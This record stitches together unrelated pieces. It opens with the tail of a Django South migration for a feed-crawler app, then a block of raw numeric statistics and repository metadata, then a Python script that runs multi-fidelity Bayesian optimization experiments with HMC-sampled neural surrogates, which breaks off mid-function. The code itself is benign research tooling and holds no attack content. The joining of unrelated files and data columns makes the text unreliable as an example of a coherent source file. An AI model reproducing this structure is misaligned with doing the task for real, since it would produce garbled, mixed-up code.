            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'feed_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.FeedType']"}),
            'group': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Group']", 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'last_polled_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'link': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}),
            'main_image': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'feed_image'", 'null': 'True', 'on_delete': 'models.SET_NULL', 'to': u"orm['images.Image']"}),
            'max_entries': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'publish_entries': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'published_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
            'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
            'source_json_params': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'source_password': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'source_port': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
            'source_root_folder': ('django.db.models.fields.CharField', [], {'default': "'/'", 'max_length': '255'}),
            'source_url': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'source_username': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)})
        },
        u'feedcrawler.feedtype': {
            'Meta': {'object_name': 'FeedType'},
            'actions': ('django.db.models.fields.CharField', [], {'default': "'opps.feedcrawler.actions.rss.RSSActions'", 'max_length': '255'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
            'processor': ('django.db.models.fields.CharField', [], {'default': "'opps.feedcrawler.processors.rss.RSSProcessor'", 'max_length': '255'})
        },
        u'feedcrawler.group': {
            'Meta': {'ordering': "['name']", 'object_name': 'Group'},
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '250'})
        },
        u'feedcrawler.processlog': {
            'Meta': {'object_name': 'ProcessLog'},
            'feed': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['feedcrawler.Feed']"}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'log_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'auto_now_add': 'True', 'blank': 'True'}),
            'text': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
        },
        u'images.image': {
            'Meta': {'object_name': 'Image'},
            'archive': ('django.db.models.fields.files.FileField', [], {'max_length': '255'}),
            'crop_example': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'crop_x1': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'crop_x2': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'crop_y1': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'crop_y2': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
            'date_available': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
            'date_insert': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
            'date_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
            'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
            'fit_in': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'flip': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'flop': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'halign': ('django.db.models.fields.CharField', [], {'default': 'False', 'max_length': '6', 'null': 'True', 'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'published': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
            'site': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['sites.Site']"}),
            'site_domain': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '100', 'null': 'True', 'blank': 'True'}),
            'site_iid': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True', 'max_length': '4', 'null': 'True', 'blank': 'True'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '150'}),
            'smart': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
            'source': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
            'tags': ('django.db.models.fields.CharField', [], {'max_length': '4000', 'null': 'True', 'blank': 'True'}),
            'title': ('django.db.models.fields.CharField', [], {'max_length': '140', 'db_index': 'True'}),
            'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['%s.%s']" % (User._meta.app_label, User._meta.object_name)}),
            'valign': ('django.db.models.fields.CharField', [], {'default': 'False', 'max_length': '6', 'null': 'True', 'blank': 'True'})
        },
        u'sites.site': {
            'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
            'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
        }
    }

    complete_apps = ['feedcrawler']
| 88.139073
| 227
| 0.591517
| 3,003
| 26,618
| 5.108225
| 0.067266
| 0.101695
| 0.177053
| 0.252934
| 0.848827
| 0.81558
| 0.790026
| 0.749283
| 0.707301
| 0.679791
| 0
| 0.011089
| 0.16996
| 26,618
| 302
| 228
| 88.139073
| 0.683217
| 0.00958
| 0
| 0.241758
| 0
| 0
| 0.548535
| 0.303848
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007326
| false
| 0.007326
| 0.018315
| 0
| 0.040293
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
03b4321599e0767f910928d2ad79b5a822db6bb2
| 48,342
|
py
|
Python
|
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | 4
|
2021-11-10T19:50:53.000Z
|
2022-03-21T15:13:42.000Z
|
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | null | null | null |
main.py
|
shib0li/BMBO-DARN
|
68f889ac8a1a2051754920fabff9e56f667b1cab
|
[
"MIT"
] | null | null | null |
import fire
import numpy as np
import torch
import os
import pickle5 as pickle
import subprocess
from datetime import datetime
from time import time
import hamiltorch
# import logging
# import ExpConfigs as exp_configs
# import Misc as misc
# import data.Dataset as Dataset
# import data.Functions as functions
from utils import ExpConfigs as exp_configs
from utils import Misc as misc
from data import Dataset as Dataset
from functionals import Functions as functions
# from baselines import SMAC3
# from baselines import SMAC4
# from baselines import Hyperband
# from baselines import BOHB
# from baselines import SHPO
# import Hamilton as hamilton
from core import Model
from core import Inference
from core import BayesOpt
from tqdm.auto import trange, tqdm
# Algorithm-name groups. Membership drives which configuration objects
# parse_exp_configs() builds for a run; the concatenation of all groups is
# the set of recognized --algorithm_name values.
MF_DNN_APPROACH = ['dnn_mf_bo']
SINGLE_BASED_APPROACH = ['mf_hmc_cs', 'mf_hmc_ucs', 'mf_hmc_fix_low', 'mf_hmc_fix_high']
PAR_HMC_BASED_APPROACH = ['par_hmc_cs', 'par_hmc_ucs']
BATCH_HMC_BASED_APPROACH = ['ratio_batch_hmc_cs', 'ratio_batch_hmc_ucs', 'bound_ratio_batch_hmc_cs']
AO_HMC_BASED_APPROACH = ['ao_batch_hmc_cs', 'ao_batch_hmc_ucs']
RANDOM_APPROACH = ['full_random']
MF_GP_BASED_APPROACH = ['mf_gp_ucb', 'mf_mes', 'par_mf_mes']
SMAC_APPROACH = ['smac', 'gp_kernel', 'hyperband', 'bohb']
MT_APPROACH = ['mtbo']
GP_TS_APPROACH = ['gp_ts']
def create_path(path):
    """Create *path* (including missing parent directories) if needed.

    Best-effort: failures are reported on stdout rather than raised,
    matching the original behaviour.

    Parameters
    ----------
    path : str
        Directory path to create.
    """
    try:
        # exist_ok=True already makes this call idempotent; the former
        # os.path.exists() pre-check was redundant and racy (TOCTOU).
        os.makedirs(path, exist_ok=True)
        print("Directory '%s' created successfully" % (path))
    except OSError:
        print("Directory '%s' can not be created" % (path))
def parse_exp_configs(kwargs):
    """Assemble all experiment configuration objects from CLI kwargs.

    Returns a dict with keys 'opt_config' and 'domain_config' (always),
    'hmc_config' (sampling-based methods only), and 'method_config' /
    'mf_nn_surrogate_config' (may be None for methods without extras).
    Raises Exception for an unrecognized algorithm name.
    """
    configs = {}
    opt_config = exp_configs.default_optimization_config()
    opt_config._parse(kwargs)
    domain_config = exp_configs.default_domain_config()
    domain_config._parse(kwargs)
    configs['opt_config'] = opt_config
    configs['domain_config'] = domain_config
    # Union of every recognized algorithm name.
    all_methods = MF_DNN_APPROACH + SINGLE_BASED_APPROACH + PAR_HMC_BASED_APPROACH + BATCH_HMC_BASED_APPROACH +\
        RANDOM_APPROACH + MF_GP_BASED_APPROACH + SMAC_APPROACH + MT_APPROACH + GP_TS_APPROACH +\
        AO_HMC_BASED_APPROACH
    # Methods that draw HMC samples and therefore need a sampler config.
    sampling_methods = MF_DNN_APPROACH + SINGLE_BASED_APPROACH + PAR_HMC_BASED_APPROACH + BATCH_HMC_BASED_APPROACH +\
        RANDOM_APPROACH + AO_HMC_BASED_APPROACH
    if opt_config.algorithm_name not in all_methods:
        raise Exception("ERROR: "+opt_config.algorithm_name+" NOT implemented.")
    if opt_config.algorithm_name in sampling_methods:
        hmc_sampler_config = exp_configs.default_hmc_sampler_config()
        hmc_sampler_config._parse(kwargs)
        configs['hmc_config'] = hmc_sampler_config
    #
    method_config = None
    mf_nn_surrogate_config = None
    # NOTE(review): two separate if/elif chains follow; the group lists are
    # disjoint, so at most one branch overall runs per algorithm name.
    if opt_config.algorithm_name in SINGLE_BASED_APPROACH:
        #
        method_config = exp_configs.default_mf_hmc_single_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    elif opt_config.algorithm_name in RANDOM_APPROACH:
        # Random search reuses the single-fidelity HMC config defaults.
        method_config = exp_configs.default_mf_hmc_single_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    if opt_config.algorithm_name in MF_DNN_APPROACH:
        #
        method_config = exp_configs.default_mf_hmc_single_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    elif opt_config.algorithm_name in PAR_HMC_BASED_APPROACH:
        #
        method_config = exp_configs.default_mf_hmc_parallel_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    elif opt_config.algorithm_name in BATCH_HMC_BASED_APPROACH:
        #
        method_config = exp_configs.default_mf_hmc_batch_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    elif opt_config.algorithm_name in AO_HMC_BASED_APPROACH:
        # AO methods share the batch HMC configuration.
        method_config = exp_configs.default_mf_hmc_batch_config()
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config._parse(kwargs)
        #
    # elif opt_config.algorithm_name in RAND_HMC_BASED_APPROACH:
    # #
    # method_config = exp_configs.default_mf_hmc_random_config()
    # mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
    # method_config._parse(kwargs)
    # mf_nn_surrogate_config._parse(kwargs)
    # #
    elif opt_config.algorithm_name in MT_APPROACH:
        # NOTE(review): MTBO's surrogate config is not re-parsed from kwargs,
        # unlike every other branch — confirm this asymmetry is intended.
        method_config = exp_configs.default_mtbo_config()
        method_config._parse(kwargs)
        mf_nn_surrogate_config = exp_configs.default_mf_nn_surrogate_config()
        #
    configs['method_config'] = method_config
    configs['mf_nn_surrogate_config'] = mf_nn_surrogate_config
    return configs
def experiment_mf_dnn(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one DNN-MFBO trial.

    Each step refits a sequential auto-regressive surrogate with HMC, selects
    a (fidelity, input) pair by information gain, queries the dataset, and
    checkpoints the accumulated history to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) exposing add_interpret().
        method_config: kept for signature parity with the other experiment_*
            runners; not read here.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    layers = misc.seq_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; appended only on a successful query.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('          Experiment with DNN-MFBO             \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.SeqAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=False)
            t_fit = time()
            argm, argx = hamil_opt.info_gain_step(hmc_samples)
            t_acq = time()
            np_argm = argm.data.cpu().numpy()
            np_argx = argx.data.cpu().numpy()
            yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=True)
            t_query = time()
            if success:
                res['hist_argm'].append(np_argm)
                res['hist_argx'].append(np_argx)
                res['hist_yq'].append(yq)
                res['hist_y_ground'].append(y_ground)
                res['hist_config'].append(config)
                res['hist_t_fit'].append(t_fit-t_trial_start)
                res['hist_t_acq'].append(t_acq-t_fit)
                res['hist_t_query_m'].append(t_query_m)
                res['hist_t_query_h'].append(t_query_h)
                logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
                logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
                logger.write('  - t_query_m = '+str(t_query_m)+' secs\n')
                logger.write('  - t_query_h = '+str(t_query_h)+' secs\n')
                logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
                logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
                logger.flush()
            else:
                logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_single_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one single-query constrained-HMC trial.

    Each step refits a full auto-regressive surrogate with HMC and either
    queries a fixed fidelity (method_config.fixed_fidelity) or chooses one by
    information gain. History is checkpointed to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) exposing add_interpret().
        method_config: supplies constraint and optional fixed_fidelity.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    layers = misc.full_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; appended only on a successful query.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('       Experiment with Single-Constrained      \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
            t_fit = time()
            if method_config.fixed_fidelity is not None:
                argm, argx = hamil_opt.fixed_fidelity_step(hmc_samples, method_config.fixed_fidelity)
                # fixed_fidelity_step appears to return a plain fidelity index,
                # not a tensor — TODO confirm against BayesOpt.HamilBayesOpt.
                np_argm = argm
            else:
                argm, argx = hamil_opt.info_gain_step(hmc_samples)
                np_argm = argm.data.cpu().numpy()
            #
            np_argx = argx.data.cpu().numpy()
            t_acq = time()
            yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=True)
            t_query = time()
            if success:
                res['hist_argm'].append(np_argm)
                res['hist_argx'].append(np_argx)
                res['hist_yq'].append(yq)
                res['hist_y_ground'].append(y_ground)
                res['hist_config'].append(config)
                res['hist_t_fit'].append(t_fit-t_trial_start)
                res['hist_t_acq'].append(t_acq-t_fit)
                res['hist_t_query_m'].append(t_query_m)
                res['hist_t_query_h'].append(t_query_h)
                logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
                logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
                logger.write('  - t_query_m = '+str(t_query_m)+' secs\n')
                logger.write('  - t_query_h = '+str(t_query_h)+' secs\n')
                logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
                logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
                logger.flush()
            else:
                logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_random(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one fully-random search trial (baseline).

    Each step picks a uniformly random fidelity and input point, queries the
    dataset, and checkpoints the history to trial<trial_id>.pickle.

    NOTE(review): the surrogate is still constructed and HMC-fitted each step
    even though the choice is random — presumably to obtain model.M and keep
    t_fit timings comparable with the other methods; confirm before removing.

    Args:
        dataset: multi-fidelity dataset (project type) exposing add_interpret().
        method_config: supplies the constraint flag for the (unused) fit.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    layers = misc.full_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; appended only on a successful query.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('          Experiment with Full-Random          \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
            t_fit = time()
            # Uniform random fidelity and a random input in the (unscaled) box.
            np_argm = np.random.randint(0, model.M)
            np_argx = misc.generate_random_inputs(1, dataset.in_dim, dataset.lb, dataset.ub, seed=np.random.randint(0,100000))
            t_acq = time()
            yq, y_ground, success, config, t_query_m, t_query_h = dataset.add_interpret(np_argx, np_argm, scaled_input=False)
            t_query = time()
            if success:
                res['hist_argm'].append(np_argm)
                res['hist_argx'].append(np_argx)
                res['hist_yq'].append(yq)
                res['hist_y_ground'].append(y_ground)
                res['hist_config'].append(config)
                res['hist_t_fit'].append(t_fit-t_trial_start)
                res['hist_t_acq'].append(t_acq-t_fit)
                res['hist_t_query_m'].append(t_query_m)
                res['hist_t_query_h'].append(t_query_h)
                logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
                logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
                logger.write('  - t_query_m = '+str(t_query_m)+' secs\n')
                logger.write('  - t_query_h = '+str(t_query_h)+' secs\n')
                logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
                logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
                logger.flush()
            else:
                logger.write('* Optimization step'+str(t+1)+' FAILED at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
                logger.write('  - argm = '+str(np_argm)+'\n')
                logger.write('  - argx = '+np.array2string(np_argx)+'\n')
                logger.flush()
            # Checkpoint after every step so partial results survive a crash.
            with open(pickle_name, 'wb') as handle:
                pickle.dump(res, handle, protocol=pickle.HIGHEST_PROTOCOL)
def experiment_par_hmc(dataset, method_config, mf_nn_surrogate_config, hmc_sampler_config, horizon, res_path, trial_id):
    """Run one (pseudo-)parallel HMC trial.

    Each step refits a full auto-regressive surrogate with HMC, acquires a
    pool of n_threads (fidelity, input) pairs, queries them all, and
    checkpoints the history to trial<trial_id>.pickle.

    Args:
        dataset: multi-fidelity dataset (project type) with add_pool_interpret().
        method_config: supplies constraint and n_threads.
        mf_nn_surrogate_config: surrogate depth/width/activation/placement.
        hmc_sampler_config: HMC step_size, L, burn and Ns settings.
        horizon: number of optimization steps to run.
        res_path: output directory for the pickle and log files.
        trial_id: trial index used in the output file names.
    """
    layers = misc.full_auto_regressive_layers(
        dataset.in_dim, dataset.out_dim,
        mf_nn_surrogate_config.hidden_depths,
        mf_nn_surrogate_config.hidden_widths,
    )
    sampling = {
        'step_size':hmc_sampler_config.step_size,
        'L':hmc_sampler_config.L,
        'burn':hmc_sampler_config.burn,
        'Ns':hmc_sampler_config.Ns
    }
    # One history list per tracked quantity; per-query lists appended only on success.
    res = {key: [] for key in (
        'hist_argm', 'hist_argx', 'hist_yq', 'hist_y_ground', 'hist_config',
        'hist_t_fit', 'hist_t_acq', 'hist_t_query_m', 'hist_t_query_h')}
    pickle_name = os.path.join(res_path, 'trial'+str(trial_id)+'.pickle')
    log_file_name = os.path.join(res_path, 'logs_trial'+str(trial_id)+'.txt')
    # 'with' guarantees the log file is closed even when a step raises.
    with open(log_file_name, 'w+') as logger:
        logger.write('===============================================\n')
        logger.write('          Experiment with Parallel HMC         \n')
        logger.write('===============================================\n')
        logger.write('Experiment start at: '+datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
        logger.flush()
        exp_t_start = time()
        for t in trange(horizon, desc='experiment', leave=True):
            t_trial_start = time()
            model = Model.FullAutoRegressive(layers, mf_nn_surrogate_config.activation,
                    torch.device(mf_nn_surrogate_config.surrogate_placement))
            hamil_opt = BayesOpt.HamilBayesOpt(model, dataset, sampling)
            hmc_samples = hamil_opt.fit(constraint=method_config.constraint)
            t_fit = time()
            pool_argm, pool_argx = hamil_opt.pseudo_par_step(hmc_samples, method_config.n_threads)
            t_acq = time()
            np_pool_argx = [argx.data.cpu().numpy() for argx in pool_argx]
            np_pool_argm = [argm.data.cpu().numpy() for argm in pool_argm]
            pool_yq, pool_y_ground, pool_success, pool_config, t_query_m_pool, t_query_h_pool =\
                dataset.add_pool_interpret(np_pool_argx, np_pool_argm, scaled_input=True)
            t_query = time()
            logger.write('* Optimization step'+str(t+1)+' finished at ' + datetime.now().strftime("%m/%d/%Y, %H:%M:%S")+'\n')
            # fit/acq timings are shared by the whole pool.
            res['hist_t_fit'].append(t_fit-t_trial_start)
            res['hist_t_acq'].append(t_acq-t_fit)
            for i in range(len(pool_success)):
                if pool_success[i]:
                    res['hist_argm'].append(np_pool_argm[i])
                    res['hist_argx'].append(np_pool_argx[i])
                    res['hist_yq'].append(pool_yq[i])
                    res['hist_y_ground'].append(pool_y_ground[i])
                    res['hist_config'].append(pool_config[i])
                    res['hist_t_query_m'].append(t_query_m_pool[i])
                    res['hist_t_query_h'].append(t_query_h_pool[i])
                    logger.write('  - Success add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Success add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                    logger.write('    * t_query_m = '+str(t_query_m_pool[i])+' secs\n')
                    logger.write('    * t_query_h = '+str(t_query_h_pool[i])+' secs\n')
                else:
                    logger.write('  - Failed add argm = '+np.array2string(np.array(np_pool_argm[i]))+'\n')
                    logger.write('  - Failed add argx = '+np.array2string(np.array(np_pool_argx[i]))+'\n')
                #
            #
            logger.write('  - t_fit_surrogate = '+str(t_fit-t_trial_start)+' secs\n')
            logger.write('  - t_acq = '+str(t_acq-t_fit)+' secs\n')
            logger.write('  - t_query = '+str(t_query-t_acq)+' secs\n')
            logger.write('  - total_elapsed = '+str(t_query-exp_t_start)+' secs\n')
